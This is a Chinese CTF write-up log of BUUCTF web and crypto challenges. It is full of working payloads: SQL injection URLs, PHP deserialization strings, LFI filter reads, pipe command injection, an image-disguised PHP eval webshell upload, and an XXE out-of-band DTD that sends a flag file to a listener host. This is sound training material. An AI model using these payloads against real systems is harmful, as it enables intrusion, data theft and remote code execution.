[toc]
0x01 周 web [极客大挑战 2019]Secret File 一路跟着提示,跟到secr3t.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <html> <title>secret</title> <meta charset="UTF-8" > <?php highlight_file(__FILE__ ); error_reporting(0 ); $file=$_GET['file' ]; if (strstr($file,"../" )||stristr($file, "tp" )||stristr($file,"input" )||stristr($file,"data" )){ echo "Oh no!" ; exit (); } include ($file); ?> </html>
php伪协议
flag.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 <!DOCTYPE html> <html> <head> <meta charset="utf-8" > <title>FLAG</title> </head> <body style="background-color:black;" ><br><br><br><br><br><br> <h1 style="font-family:verdana;color:red;text-align:center;" >啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br> <p style="font-family:arial;color:red;font-size:20px;text-align:center;" > <?php echo "我就在这里" ; $flag = 'flag{51e7f07f-2e27-445a-ae66-4341c6252450}' ; $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd' ?> </p> </body> </html>
[极客大挑战 2019]PHP 根据提示应该有源代码泄露
1 python3 .\dirsearch.py -u "http://3fe07257-2515-4fc0-b3b6-dcd182c6742f.node3.buuoj.cn/" -e php --delay 1
注意请求过多429
1 2 3 4 5 6 7 └─[极客大挑战 2019]PHP1 └─www class.php flag.php index.js index.php style.css
1 2 3 4 5 <?php include 'class.php' ;$select = $_GET['select' ]; $res=unserialize(@$select); ?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 <?php include 'flag.php' ;error_reporting(0 ); class Name private $username = 'nonono' ; private $password = 'yesyes' ; public function __construct ($username,$password ) $this ->username = $username; $this ->password = $password; } function __wakeup ( $this ->username = 'guest' ; } function __destruct ( if ($this ->password != 100 ) { echo "</br>NO!!!hacker!!!</br>" ; echo "You name is: " ; echo $this ->username;echo "</br>" ; echo "You password is: " ; echo $this ->password;echo "</br>" ; die (); } if ($this ->username === 'admin' ) { global $flag; echo $flag; }else { echo "</br>hello my friend~~</br>sorry i can't give you the flag!" ; die (); } } } ?>
考点__wakeup()绕过
当反序列化字符串中,表示属性个数的值大于其真实值,则跳过__wakeup()执行。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?php error_reporting(0 ); class Name private $username = 'nonono' ; private $password = 'yesyes' ; public function __construct ( $this ->username = 'admin' ; $this ->password = 100 ; } } $a = new Name(); $aa = serialize($a); echo $aa;
1 O:4 :"Name" :3 :{s:14 :"%00Name%00username" ;s:5 :"admin" ;s:14 :"%00Name%00password" ;i:100 ;}
[极客大挑战 2019]LoveSQL
这个题目死死地提醒了我,有时不是Payload没用,而是你忘记编码。。。
报错注入
1 http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select )))%23&password=1
XPATH syntax error: ‘ geek’
1 http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select group_concat(table_name) from information_schema.tables where table_schema='geek' )))%23&password=1
XPATH syntax error: ‘ geekuser,l0ve1ysq1’
1 http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select mid(group_concat(column_name),1,32)from information_schema.columns where table_schema='geek' and table_name= 'geekuser')))%23&password=1
XPATH syntax error: ‘ id,username,password’
1 2 3 4 and updatexml(1,concat(0x7e,(select group_concat(username) from geek.geekuser),0x7e),1) --+ and updatexml(1,concat(0x7e,(select mid(group_concat(password),25,40) from geek.geekuser),0x7e),1) %23&password=1
得:
1 username=admin&password=d5e5cfb07c326d6707635db2357de47
。。。。么的用
换个法子cai发现可以联合查找,吐血
直接查找l0ve1ysq1表
1 http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(password) from geek.l0ve1ysq1%23&password=1
flag在password的最后一部分
极客大挑战 2019]Knife 直接连webshell工具,flag在/flag
0x02周
想复现最近比赛的题目。
web [网鼎杯 2018]Fakebook 此题的注入点是
1 http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1
fuzz中显示报错注入函数还可以使用
1 2 3 4 5 6 7 http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat (schema_name) from information_schema.schemata),1 ,32 ),'~' ))) http ://f96cd01a-4 f46-4960 -84 fd-52 bf8595d3f8.node3.buuoj.cn/view.php?no =1 and (extractvalue(1 , concat ('~' ,mid ((select group_concat (schema_name) from information_schema.schemata),32 ,64 ),'~' )))
result:
fakebook,information_schema,mysql,performance_schema,test
当前数据库
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat (table_name) from information_schema.tables where table_schema=database () ),1 ,64 ),'~' ))) [*] query error ! (XPATH syntax error : '~users~' ) http ://f96cd01a-4 f46-4960 -84 fd-52 bf8595d3f8.node3.buuoj.cn/view.php?no =1 and (extractvalue(1 , concat ('~' ,mid ((select group_concat (column_name) from information_schema.columns where table_schema=database () and table_name='users' ),1 ,64 ),'~' ))) [*] query error ! (XPATH syntax error : '~no,username,passwd,data~' ) http ://f96cd01a-4 f46-4960 -84 fd-52 bf8595d3f8.node3.buuoj.cn/view.php?no =1 and (extractvalue(1 , concat ('~' ,mid ((select group_concat (no ) from users ),1 ,64 ),'~' ))) [*] query error ! (XPATH syntax error : '~1,2,3,4,5~' ) http ://f96cd01a-4 f46-4960 -84 fd-52 bf8595d3f8.node3.buuoj.cn/view.php?no =1 and (extractvalue(1 , concat ('~' ,mid ((select group_concat (data ) from users ),49 ,1000 ),'~' ))) O:8:"UserInfo":3:{s:4:"name";s:2:"11";s:3:"age";i:11;s:4:"blog";s:12:"http://1.com";},O:8:"UserInfo":3:{s:4:"name";s:3:"111....
再扫描路径发现备份文件
/user.php.bak
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 <?php class UserInfo public $name = "" ; public $age = 0 ; public $blog = "" ; public function __construct ($name, $age, $blog ) { $this ->name = $name; $this ->age = (int )$age; $this ->blog = $blog; } function get ($url ) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); $output = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($httpCode == 404 ) { return 404 ; } curl_close($ch); return $output; } public function getBlogContents ( { return $this ->get($this ->blog); } public function isValidBlog ( { $blog = $this ->blog; return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i" , $blog); } }
利用file:// 和 序列化 读取文件
1 http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no= 0/**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"fe1w0";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#
[极客大挑战 2019]Http 1 2 3 4 5 6 7 8 9 10 11 GET /Secret.php HTTP/1.1Host : node3.buuoj.cn:26240Pragma : no-cacheCache-Control : no-cacheUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Syclover/84.0.4133.0 Safari/537.36 Edg/84.0.508.0Accept : image/webp,image/apng,image/*,*/*;q=0.8Referer : https://www.Sycsecret.comAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection : closeX-Forwarded-For : 127.0.0.1
[GXYCTF2019]Ping Ping Ping
明显的命令执行
参考
https://blog.csdn.net/miuzzx/article/details/104617234
https://www.cnblogs.com/wangtanzhi/p/12246386.html
有空整理一下,命令执行相关知识
[ACTF2020 新生赛]Include 1 2 3 4 5 6 7 8 9 10 11 12 13 <meta charset="utf8" > <?php error_reporting(0 ); $file = $_GET["file" ]; if (stristr($file,"php://input" ) || stristr($file,"zip://" ) || stristr($file,"phar://" ) || stristr($file,"data:" )){ exit ('hacker!' ); } if ($file){ include ($file); }else { echo '<a href="?file=flag.php">tips</a>' ; } ?>
1 http://f9a66afc-c568-41e2-8e62-6dc3fc6eef68.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php
[极客大挑战 2019]BabySQL 手测过滤了 select union or and if mid
但双写就行
1 http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' oorr 1=1--+
login success
6624c656c910f997ad9393630d1aca7d
1 http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' uniunionon seselectlect 1,2, group_concat(schema_name) frofromm infoorrmation_schema.schemata %23
Your password is ‘information_schema,mysql,performance_schema,test,ctf,geek’
1 http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' uniunionon seselectlect 1,2, group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema='ctf' %23
Your password is ‘Flag’
1 http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' uniunionon seselectlect 1,2, group_concat(column_name) frofromm infoorrmation_schema.columns whwhereere table_schema='ctf' anandd table_name='Flag'%23
Your password is ‘flag’
1 http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' uniunionon seselectlect 1,2, group_concat(flag) frofromm ctf.Flag %23
[极客大挑战 2019]BuyFlag 查看payflag.php的页面源代码
1 2 3 4 5 6 7 8 9 10 11 <!-- ~~~post money and password~~~ if (isset ($_POST['password' ])) { $password = $_POST['password' ]; if (is_numeric($password)) { echo "password can't be number</br>" ; }elseif ($password == 404 ) { echo "Password Right!</br>" ; } } -->
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /pay.php HTTP/1.1Host : f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cnContent-Length : 26Cache-Control : max-age=0Upgrade-Insecure-Requests : 1Origin : http://f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cnContent-Type : application/x-www-form-urlencodedUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4133.0 Safari/537.36 Edg/84.0.508.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer : http://f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cn/pay.phpAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie : user=1Connection : closepassword=404a&money=1e99
跟着提示做就行
[ACTF2020 新生赛]Exec 比 PING PING PING
1 2 3 123|find / -name /flag 123|cat /flag
[ZJCTF 2019]NiZhuanSiWe 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?php $text = $_GET["text" ]; $file = $_GET["file" ]; $password = $_GET["password" ]; if (isset ($text)&&(file_get_contents($text,'r' )==="welcome to the zjctf" )){ echo "<br><h1>" .file_get_contents($text,'r' )."</h1></br>" ; if (preg_match("/flag/" ,$file)){ echo "Not now!" ; exit (); }else { include ($file); $password = unserialize($password); echo $password; } } else { highlight_file(__FILE__ ); } ?>
😒 edge 上的hackbar有时不是很顶用,还是火狐上的hackbar插件准确率高
1 2 3 4 http://3eacb34b-c73c-4205-8cbe-1a2574bb0970.node3.buuoj.cn/index.php?text=php://input&file=file:///etc/passwd [post] welcome to the zjctf
根据提示读取useless.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php class Flag public $file; public function __tostring ( if (isset ($this ->file)){ echo file_get_contents($this ->file); echo "<br>" ; return ("U R SO CLOSE !///COME ON PLZ" ); } } } ?>
payload
1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST /index.php?text=php://input&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;} HTTP/1.1Host : 3eacb34b-c73c-4205-8cbe-1a2574bb0970.node3.buuoj.cnUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language : en-US,en;q=0.5Accept-Encoding : gzip, deflateConnection : closeUpgrade-Insecure-Requests : 1X-Forwarded-For : 127.0.0.1Pragma : no-cacheCache-Control : no-cacheContent-Length : 20welcome to the zjctf
[极客大挑战 2019]Upload 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 POST /upload_file.php HTTP/1.1Host : 86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cnContent-Length : 340Cache-Control : max-age=0Upgrade-Insecure-Requests : 1Origin : http://86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cnContent-Type : multipart/form-data; boundary=----WebKitFormBoundaryZjya86HWY0DubZE0User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4133.0 Safari/537.36 Edg/84.0.508.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer : http://86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cn/Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection : close------WebKitFormBoundaryZjya86HWY0DubZE0 Content-Disposition : form-data; name="file"; filename="cc.phtml"Content-Type : image/gifGIF89a? <script language="php">eval($_REQUEST['f'])</script> ------WebKitFormBoundaryZjya86HWY0DubZE0 Content-Disposition : form-data; name="submit"æ交 ------WebKitFormBoundaryZjya86HWY0DubZE0--
再连接ANTSWORD
[RoarCTF 2019]Easy Java
u1s1 Java不会,明天上课时候看看
WEB-INF/web.xml泄露
1 2 3 4 5 6 7 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。 /WEB-INF/database.properties:数据库配置文件 漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码
漏洞成因:
1 通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取。漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码。一般情况,jsp引擎默认都是禁止访问WEB-INF目录的,Nginx 配合Tomcat做均衡负载或集群等情况时,问题原因其实很简单,Nginx不会去考虑配置其他类型引擎(Nginx不是jsp引擎)导致的安全问题而引入到自身的安全规范中来(这样耦合性太高了),修改Nginx配置文件禁止访问WEB-INF目录就好了: location ~ ^/WEB-INF/* { deny all; } 或者return 404; 或者其他!
POST /Download?filename=/WEB-INF/web.xml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns ="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi ="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation ="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version ="4.0" > <welcome-file-list > <welcome-file > Index</welcome-file > </welcome-file-list > <servlet > <servlet-name > IndexController</servlet-name > <servlet-class > com.wm.ctf.IndexController</servlet-class > </servlet > <servlet-mapping > <servlet-name > IndexController</servlet-name > <url-pattern > /Index</url-pattern > </servlet-mapping > <servlet > <servlet-name > LoginController</servlet-name > <servlet-class > com.wm.ctf.LoginController</servlet-class > </servlet > <servlet-mapping > <servlet-name > LoginController</servlet-name > <url-pattern > /Login</url-pattern > </servlet-mapping > <servlet > <servlet-name > DownloadController</servlet-name > <servlet-class > com.wm.ctf.DownloadController</servlet-class > </servlet > <servlet-mapping > <servlet-name > DownloadController</servlet-name > <url-pattern > /Download</url-pattern > </servlet-mapping > <servlet > <servlet-name > FlagController</servlet-name > <servlet-class > com.wm.ctf.FlagController</servlet-class > </servlet > <servlet-mapping > <servlet-name > FlagController</servlet-name > <url-pattern > /Flag</url-pattern > </servlet-mapping > </web-app >
http://90e20284-6ad5-42e6-8e86-87aa6a2d443a.node3.buuoj.cn/Download?filename=/WEB-INF/classes/com/wm/ctf/FlagController.class
base64解码
[BJDCTF2020]Easy MD5
https://blog.csdn.net/qq_19980431/article/details/83018232
https://blog.csdn.net/March97/article/details/81222922
http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes
0x01 查看响应头
参数
描述
string
必需。要计算的字符串。
raw
可选。默认不写为FALSE。32位16进制的字符串TRUE。16位原始二进制格式的字符串
原理利用 md5($pass,true)时,返回值为16位原始二进制格式的字符串
1 2 3 4 content: ffifdyop hex: 276f722736c95d99e921722cf9ed621c raw: 'or' 6\xc9]\x99\xe9!r,\xf9\xedb\x1c string: 'or' 6]!r,b
拼接后的查询语句为
1 2 3 select * from 'admin' where password ='' or '6]!r,b' ;select * from 'admin' where password ='' or '6xxxx' ;
访问得到下一关
1 <script > window .location.replace('./levels91.php' )</script
0x02 源代码
利用php弱类型
a=s1836677006a&b=s1885207154a
0x03 1 2 3 4 5 6 7 8 9 10 <?php error_reporting(0 ); include "flag.php" ;highlight_file(__FILE__ ); if ($_POST['param1' ]!==$_POST['param2' ]&&md5($_POST['param1' ])===md5($_POST['param2' ])){ echo $flag; }
[ACTF2020 新生赛]BackupFile 源文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <?php include_once "flag.php" ;if (isset ($_GET['key' ])) { $key = $_GET['key' ]; if (!is_numeric($key)) { exit ("Just num!" ); } $key = intval($key); $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3" ; if ($key == $str) { echo $flag; } } else { echo "Try to find out source file!" ; }
http://19f24e41-44d2-46bc-9763-1f20eeeda2f9.node3.buuoj.cn/?key=123
….没多大意思
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php if (isset ($_SERVER['HTTP_X_FORWARDED_FOR' ])) { $_SERVER['REMOTE_ADDR' ] = $_SERVER['HTTP_X_FORWARDED_FOR' ]; } if (!isset ($_GET['host' ])) { highlight_file(__FILE__ ); } else { $host = $_GET['host' ]; $host = escapeshellarg($host); $host = escapeshellcmd($host); $sandbox = md5("glzjin" . $_SERVER['REMOTE_ADDR' ]); echo 'you are in sandbox ' .$sandbox; @mkdir($sandbox); chdir($sandbox); echo system("nmap -T5 -sT -Pn --host-timeout 2 -F " .$host); }
0x03周
刚好将网鼎杯上不会的,学习学习学习
web [网鼎杯 2020 青龙组]AreUSerialz 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 <?php include ("flag.php" );highlight_file(__FILE__ ); class FileHandler protected $op; protected $filename; protected $content; function __construct ( $op = "1" ; $filename = "/tmp/tmpfile" ; $content = "Hello World!" ; $this ->process(); } public function process ( if ($this ->op == "1" ) { $this ->write(); } else if ($this ->op == "2" ) { $res = $this ->read(); $this ->output($res); } else { $this ->output("Bad Hacker!" ); } } private function write ( if (isset ($this ->filename) && isset ($this ->content)) { if (strlen((string )$this ->content) > 100 ) { $this ->output("Too long!" ); die (); } $res = file_put_contents($this ->filename, $this ->content); if ($res) $this ->output("Successful!" ); else $this ->output("Failed!" ); } else { $this ->output("Failed!" ); } } private function read ( $res = "" ; if (isset ($this ->filename)) { $res = file_get_contents($this ->filename); } return $res; } private function output ($s ) echo "[Result]: <br>" ; echo $s; } function __destruct ( if ($this ->op === "2" ) $this ->op = "1" ; $this ->content = "" ; $this ->process(); } } function is_valid ($s ) for ($i = 0 ; $i < strlen($s); $i++) if (!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125 )) return false ; return true ; } if (isset ($_GET{'str' })) { $str = (string )$_GET['str' ]; if (is_valid($str)) { $obj = unserialize($str); } }
此题难点在于 得知道 在php7.2及以上版本中,public可以直接赋值protected中,这点Knight前辈赛后手撕了一波源码 Orz
得知这点后,可以绕过 is_valid()
读取文件
1 2 3 # O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:18:"/proc/self/cmdline";s:7:"content";N;} # O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:43:"/etc/apache2/sites-enabled/000-default.conf";s:7:"content";N;} # O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:22:"/var/www/html/flag.php";s:7:"content";N;}
注意看源代码
[网鼎杯 2020 青龙组]filejava 此题存在web.xml泄露
/etc/passwd 下载
web.xml
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns ="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi ="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation ="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version ="4.0" > <servlet > <servlet-name > DownloadServlet</servlet-name > <servlet-class > cn.abc.servlet.DownloadServlet</servlet-class > </servlet > <servlet-mapping > <servlet-name > DownloadServlet</servlet-name > <url-pattern > /DownloadServlet</url-pattern > </servlet-mapping > <servlet > <servlet-name > ListFileServlet</servlet-name > <servlet-class > cn.abc.servlet.ListFileServlet</servlet-class > </servlet > <servlet-mapping > <servlet-name > ListFileServlet</servlet-name > <url-pattern > /ListFileServlet</url-pattern > </servlet-mapping > <servlet > <servlet-name > UploadServlet</servlet-name > <servlet-class > cn.abc.servlet.UploadServlet</servlet-class > </servlet > <servlet-mapping > <servlet-name > UploadServlet</servlet-name > <url-pattern > /UploadServlet</url-pattern > </servlet-mapping > </web-app >
根据web.xml上的信息下载class文件
以UploadServlet为例
1 http://ip/DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/UploadServlet.class
反编译
参考 Apache-Poi-XXE-Analysis
在buuoj上再请求一个内网主机
174.1.112.13
在/var/www/html 建立test.dtd
1 2 <!ENTITY % file SYSTEM "file:///flag"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://174.1.112.13:2999?p=%file;'>">
并修改xlsx中的[Content_Types].xml为
1 2 3 4 5 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://174.1.112.13/test.dtd" > %remote;%int;%send; ]>
注意文件名必须要以excel-开头 xlsx结尾
上传xlsx文件,并监听2999端口
1 2 3 root@490 bb1f24012:/var/www/html Serving HTTP on 0.0 .0 .0 port 2999 ... 174.1 .111 .213 - - [21 /May/2020 15 :55 :12 ] "GET /?p=flag{105d56b3-ae57-40a7-9f4d-5aa0010827ac} HTTP/1.1" 200 -
相关资料
Apache-Poi-XXE-Analysis
带外通道技术(OOB)总结
[网鼎杯 2020 朱雀组]phpweb 源代码读取
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 <?php $disable_fun = array ( "exec" , "shell_exec" , "system" , "passthru" , "proc_open" , "show_source" , "phpinfo" , "popen" , "dl" , "eval" , "proc_terminate" , "touch" , "escapeshellcmd" , "escapeshellarg" , "assert" , "substr_replace" , "call_user_func_array" , "call_user_func" , "array_filter" , "array_walk" , "array_map" , "registregister_shutdown_function" , "register_tick_function" , "filter_var" , "filter_var_array" , "uasort" , "uksort" , "array_reduce" , "array_walk" , "array_walk_recursive" , "pcntl_exec" , "fopen" , "fwrite" , "file_put_contents" ); function gettime ( $func , $p ) $result = call_user_func ( $func , $p ); $a = gettype ( $result ); if ( $a == "string" ) { return $result ; } else {return "" ;} } class Test var $p = "Y-m-d h:i:s a" ; var $func = "date" ; function __destruct ( if ( $this -> func != "" ) { echo gettime ( $this -> func , $this -> p ); } } } $func = $_REQUEST [ "func" ]; $p = $_REQUEST [ "p" ]; if ( $func != null ) { $func = strtolower ( $func ); if (! in_array ( $func , $disable_fun )) { echo gettime ( $func , $p ); }else { die ( "Hacker..." ); } } ?>
利用反序列化
这题好像无法反弹shell
crypto [网鼎杯 2020 青龙组]you_raise_me_up 1 2 3 4 5 6 7 8 9 10 11 12 13 from Crypto.Util.number import *import randomn = 2 ** 512 m = random.randint(2 , n-1 ) | 1 c = pow(m, bytes_to_long(flag), n) print 'm = ' + str(m)print 'c = ' + str(c)
离散对数,求x 问题
https://blog.csdn.net/qq_41956187/article/details/104981499
这题直接使用python MATH中的log,你会发现log(x,y)是有长度限制的,这也是比赛过程中,最令我纠结的问题
赛后看学长的wp做的
使用Sage Math
简单的安装和使用实例:https://www.jianshu.com/p/ddf9376334cd
1 2 3 4 5 6 7 8 9 10 11 12 13 ┌────────────────────────────────────────────────────────────────────┐ │ SageMath version 9.0 , Release Date: 2020 -01 -01 │ │ Using Python 3.7 .3 . Type "help()" for help. │ └────────────────────────────────────────────────────────────────────┘ sage: m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386 ....: 318986881041563704825943945069343345307381099559075 sage: c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373 ....: 211308485605397024123180085924117610802485972584499 sage: n = 2 **512 sage: m = Mod(m, n) sage: c = Mod(c, n) sage: discrete_log(c, m) 56006392793405651552924479293096841126763872290794186417054288110043102953612574215902230811593957757
pip3 install pycryptodome
1 2 3 from Crypto.Util.number import *flag = 56006392793405651552924479293096841126763872290794186417054288110043102953612574215902230811593957757 print(long_to_bytes(flag))
[网鼎杯 2020 青龙组]boom
不推荐直接打开
0x01 cmd5查询
46e5efe6165a5afb361217446a2dbd01
en5oy
0x02 1 2 3 4 5 This time:Here are have some formulas 3x-y+z=185 2x+3y-z=321 x+y+z=173 input: x = 74 input: y = 68 input: z = 31
0x03 1 2 3 4 5 6 7 8 Last time: Kill it x*x+x-7943722218936282 =0 input x: 89127561 for i in range(10000000 ,100000000 ): if (i*(i+1 )==7943722218936282 ): print(str(i))
0x04 周 web [网鼎杯 2020 青龙组]notes 参考:
https://www.anquanke.com/post/id/204856#h2-2
http://www.luyixian.cn/news_show_381840.aspx
如果对原型链污染不了解,可以看看P神这篇文章
原型链污染:
https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 var express = require ('express' );var path = require ('path' );const undefsafe = require ('undefsafe' );const { exec } = require ('child_process' );var app = express();class Notes constructor () { this .owner = "whoknows" ; this .num = 0 ; this .note_list = {}; } write_note(author, raw_note) { this .note_list[(this .num++).toString()] = {"author" : author,"raw_note" :raw_note}; } get_note(id) { var r = {} undefsafe(r, id, undefsafe(this .note_list, id)); return r; } edit_note(id, author, raw) { undefsafe(this .note_list, id + '.author' , author); undefsafe(this .note_list, id + '.raw_note' , raw); } get_all_notes() { return this .note_list; } remove_note(id) { delete this .note_list[id]; } } var notes = new Notes();notes.write_note("nobody" , "this is nobody's first note" ); app.set('views' , path.join(__dirname, 'views' )); app.set('view engine' , 'pug' ); app.use(express.json()); app.use(express.urlencoded({ extended : false })); app.use(express.static(path.join(__dirname, 'public' ))); app.get('/' , function (req, res, next ) res.render('index' , { title : 'Notebook' }); }); app.route('/add_note' ) .get(function (req, res ) res.render('mess' , {message : 'please use POST to add a note' }); }) .post(function (req, res ) let author = req.body.author; let raw = req.body.raw; if (author && raw) { notes.write_note(author, raw); res.render('mess' , {message : "add note sucess" }); } else { res.render('mess' , {message : "did not add note" }); } }) app.route('/edit_note' ) .get(function (req, res ) res.render('mess' , {message : "please use POST to edit a note" }); }) .post(function (req, res ) let id = req.body.id; let author = req.body.author; let enote = req.body.raw; if 